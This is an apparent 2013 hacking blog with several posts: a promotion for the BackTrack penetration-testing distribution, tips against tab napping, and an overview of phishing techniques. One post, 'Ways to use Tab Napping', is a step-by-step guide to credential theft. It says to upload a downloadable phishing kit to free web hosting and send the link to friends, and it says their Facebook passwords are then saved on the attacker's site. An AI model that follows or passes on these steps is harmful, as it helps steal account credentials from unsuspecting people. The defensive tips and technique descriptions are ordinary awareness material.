Saturday, April 20, 2013

Download BackTrack

Click Here to download BackTrack.

Operating System designed only for hacking

BackTrack is a Linux-based penetration testing arsenal that aids security professionals in the ability to perform assessments in a purely native environment dedicated to hacking. Regardless if you’re making BackTrack you Install BackTrack, boot it from a Live DVD or thumbdrive, the penetration distribution has been customized down to every package, kernel configuration, script and patch solely for the purpose of the penetration tester.

BackTrack is intended for all audiences from the most savvy security professionals to early newcomers to the information security field. BackTrack promotes a quick and easy way to find and update the largest database of security tools collection to-date. Our community of users range from skilled penetration testers in the information security field, government entities, information technology, security enthusiasts, and individuals new to the security community.
 
Feedback from all industries and skill levels allows us to truly develop a solution that is tailored towards everyone and far exceeds anything ever developed both commercially and freely available. The project is funded by Offensive Security. Whether you’re hacking wireless, exploiting servers, performing a web application assessment, learning, or social-engineering a client, BackTrack is the one-stop-shop for all of your security needs.
 

Friday, April 19, 2013

Ways to prevnt Tab Napping

Here are six simple ways you can prevent yourself :-
  • Make sure you always check the URL in the browser address page is correct before you enter any login details. A fake tabbed page will have a different URL to the website you think you’re using.
  • Always check the URL has a secure https:// address even if you don’t have tabs open on the browser.
  • If the URL looks suspicious in any way, close the tab and reopen it by entering the correct URL again.
  • Avoid leaving tabs open which require you to type in secure login details. Don't open any tabs while doing online banking - open new windows instead (CTL + N).
  • Don't open any tabs while doing online banking. And your browser have to be updated .
  • Ways to use Tab Napping

    Steps:

    1) First of all you have a web hosting (website) and if you don’t have your own website then create Free website with following website :
    www.000webhost.com 


    www.host1free.com 
    www.my3gb.com 
    or you can search on google and create an account.

    2) Now download the script and phishing pages from here:  http://www.mediafire.com/?0zrp565h8v90jbe

    3) Upload the extracted files into your site using FileZilla Software. Download FileZilla From here: http://www.filehippo.com/download_filezilla/

    4) Give the link of your site to your friends.

    5)The site that you have created will display a game which is set at a very high difficulty level and it is not possible to complete the game and after your friend is done trying to complete the game. He will open Google, youtube, facebook, yahoo or any other site in another tab or window.. and when he returns to the game it will automatically be directed to the facebook login and when he enters the password it will be saved. you can see the passwors by typing: www.yoursite/fb/passwords.

    Wednesday, April 17, 2013

    Email/ Spam

    Phishers may send the same email to millions of users, requesting them to fill in personal details. These details will be used by the phishers for their illegal activities. Phishing with email and spam is a very common phishing scam. Most of the messages have an urgent note which requires the user to enter credentials to update account information, change details, and verify accounts. Sometimes, they may be asked to fill out a form to access a new service through a link which is provided in the email.

    Web Based Delivery

    Web based delivery is one of the most sophisticated phishing techniques. Also known as “man-in-the-middle,” the hacker is located in between the original website and the phishing system. The phisher traces details during a transaction between the legitimate website and the user. As the user continues to pass information, it is gathered by the phishers, without the user knowing about it.

    Instant Messaging

    Instant messaging is the method in which the user receives a message with a link directing them to a fake phishing website which has the same look and feel as the legitimate website. If the user doesn’t look at the URL, it may be hard to tell the difference between the fake and legitimate websites. Then, the user is asked to provide personal information on the page.

    Trojan Hosts

    Trojan hosts are invisible hackers trying to log into your user account to collect credentials through the local machine. The acquired information is then transmitted to phishers.

    Link Manipulation

    Link manipulation is the technique in which the phisher sends a link to a website. When the user clicks on the deceptive link, it opens up the phisher’s website instead of the website mentioned in the link. One of the anti-phishing techniques used to prevent link manipulation is to move the mouse over the link to view the actual address.

    Key Loggers

    Key loggers refer to the malware used to identify inputs from the keyboard. The information is sent to the hackers who will decipher passwords and other types of information. To prevent key loggers from accessing personal information, secure websites provide options to use mouse click to make entries through the virtual keyboard.

    Session Hacking

    In session hacking, the phisher exploits the web session control mechanism to steal information from the user. In a simple session hacking procedure known as session sniffing, the phisher can use a sniffer to intercept relevant information so that he or she can access the Web server illegally.

    System Reconfiguration

    Phishers may send a message whereby the user is asked to reconfigure the settings of the computer. The message may come from a web address which resembles a reliable source.

    Content Injection

    Content injection is the technique where the phisher changes a part of the content on the page of a reliable website. This is done to mislead the user to go to a page outside the legitimate website where the user is asked to enter personal information.

    Phishing through Search Engines

    Some phishing scams involve search engines where the user is directed to products sites which may offer low cost products or services. When the user tries to buy the product by entering the credit card details, it’s collected by the phishing site. There are many fake bank websites offering credit cards or loans to users at a low rate but they are actually phishing sites.

    Phone Phishing

    In phone phishing, the phisher makes phone calls to the user and asks the user to dial a number. The purpose is to get personal information of the bank account through the phone. Phone phishing is mostly done with a fake caller ID.

    Phishing through Search Engines

    Some phishing scams involve search engines where the user is directed to products sites which may offer low cost products or services. When the user tries to buy the product by entering the credit card details, it’s collected by the phishing site. There are many fake bank websites offering credit cards or loans to users at a low rate but they are actually phishing sites.

    Malware Phishing

    Phishing scams involving malware require it to be run on the user’s computer. The malware is usually attached to the email sent to the user by the phishers. Once you click on the link, the malware will start functioning. Sometimes, the malware may also be attached to downloadable files. Phishers take advantage of the vulnerability of web security services to gain sensitive information which is used for fraudulent purposes. This is why it’s always a good idea to learn about the various phishing techniques, including phishing with Trojans and Spyware.

    Tab Napping

    Tab napping is an internet based attack that is used to obtain your login name and password for almost any website. You may be vulnerable to certain attacks even if you have anti-malware software installed. This type of attack uses the new and improved tab browsing technique added to Internet Explorer 8, Mozilla, Chrome and any other web browser that uses tabs.